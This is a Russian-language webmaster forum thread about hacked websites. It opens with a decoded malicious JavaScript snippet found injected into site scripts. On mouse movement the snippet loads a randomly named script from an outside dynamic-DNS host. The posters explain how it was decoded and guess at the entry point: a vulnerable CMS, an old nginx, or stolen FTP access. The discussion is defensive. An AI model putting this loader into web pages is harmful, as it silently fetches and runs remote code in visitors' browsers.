Code: (function() { var url = 'http://psaxxxbvww.dnsalias.net/g/'; if (typeof window.xyzflag === 'undefined') { window.xyzflag = 0; } document.onmousemove = function() { if (window.xyzflag === 0) { window.xyzflag = 1; var head = document.getElementsByTagName('head')[0]; var script = document.createElement('script'); script.type = 'text/javascript'; script.onreadystatechange = function () { if (this.readyState == 'complete') { window.xyzflag = 2; } }; script.onload = function() { window.xyzflag = 2; }; script.src = url + Math.random().toString().substring(3) + '.js'; head.appendChild(script); } }; })();
ой спасибо,а где нибудь есть электронный переводчик?или вы настолько специально обученный,что вручную так шустро перевели?
В данном случае было весьма просто, когда я заметил Code: eval(h5fef0b); eval заменил на alert и увидел код.
Удалить не проблема, где гарантии что опять не появится. Хотелось бы выяснить что за новый вирус такой который только в ява скрипты лезет.
lankaster1 вопрос не совсем корректный, ибо мб на сайте cms дырявая... и ещё куча возможных вариаций... так что гарантий никаких_))
И как, нашли в чём причина? У меня тоже сайты как минимум на четырёх хостингах сломали. Подозрения падают на жомлу
Почитайте логи на ночь, может поможет ) Если ОС на хостинге windows, а веб-сервер nginx с версией 1.2.0 или меньше, то возможно вас поимели через это
Читал логи, ничего подозрительного. Возможно, изменения производились по ftp. На многих хостингах использовался sftp, вряд ли пароли отсниффили. И пароли были довольно сложные.